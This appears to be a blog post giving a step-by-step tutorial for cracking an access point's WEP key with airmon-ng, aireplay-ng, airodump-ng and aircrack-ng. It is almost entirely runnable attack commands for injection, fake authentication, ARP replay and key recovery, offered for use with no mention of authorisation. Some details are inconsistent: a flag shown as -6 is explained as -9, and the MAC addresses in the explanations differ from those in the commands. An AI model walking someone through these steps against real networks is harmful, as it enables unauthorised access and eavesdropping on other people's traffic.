Overview
To crack the WEP key for an access point, we need to gather lots of
initialization vectors (IVs). Normal network traffic does not
typically generate these IVs very quickly. Theoretically, if you are
patient, you can gather sufficient IVs to crack the WEP key by simply
listening to the network traffic and saving them. Since none of us are
patient, we use a technique called injection to speed up the process.
Injection involves having the access point (AP) resend selected packets
over and over very rapidly. This allows us to capture a large number
of IVs in a short period of time.
Equipments used
Wifi Adaptor : Alfa AWUS036H (available on eBay & Amazon)
Software : Backtrack 4 (Free download from http://www.backtrack-linux.org)
Software : Backtrack 4 (Free download from http://www.backtrack-linux.org)
Step 1 – Start the wireless interface in monitor mode on AP channel
airmon-ng start wlan1 6
starts wifi interface in channel 6
Step 2 – Test Wireless Device Packet Injection
aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E wlan1
-9 means injection
-a 00:1B:11:24:27:2E is the access point MAC address
Step 3 – Start airodump-ng to capture the IVs
airodump-ng -c 6 –bssid 00:1B:11:24:27:2E -w output wlan1
Step 4 – Use aireplay-ng to do a fake authentication with the access point
In order for an access point to accept a packet, the source MAC
address must already be associated. If the source MAC address you are
injecting is not associated then the AP ignores the packet and sends
out a “DeAuthentication” packet in cleartext. In this state, no new IVs
are created because the AP is ignoring all the injected packets.
aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
-1 means fake authentication
0 reassociation timing in seconds
-e infosec is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address
OR
aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
2 – Reauthenticate every 2 seconds.
-o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 – Send keep alive packets every 10 seconds.
Troubleshooting Tips
Some access points are configured to only allow selected MAC
addresses to associate and connect. If this is the case, you will not
be able to successfully do fake authentication unless you know one of
the MAC addresses on the allowed list. If you suspect this is the
problem, use the following command while trying to do fake
authentication. Start another session and…
Run: tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”
You would then look for error messages.
If at any time you wish to confirm you are properly associated is
to use tcpdump and look at the packets. Start another session and…
Run: “tcpdump -n -e -s0 -vvv -i wlan1”
Here is a typical tcpdump error message you are looking for:
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82
SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from
nonassociated station
Notice that the access point (00:14:6c:7e:40:80) is telling the
source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will
not process or accept the injected packets.
If you want to select only the DeAuth packets with tcpdump then
you can use: “tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth”. You
may need to tweak the phrase “DeAuth” to pick out the exact packets you
want.
Step 5 – Start aireplay-ng in ARP request replay mode
aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
Step 6 – Run aircrack-ng to obtain the WEP key
aircrack-ng -b 00:1B:11:24:27:2E output*.cap
All Done!
source: hackingarticles
No comments:
Post a Comment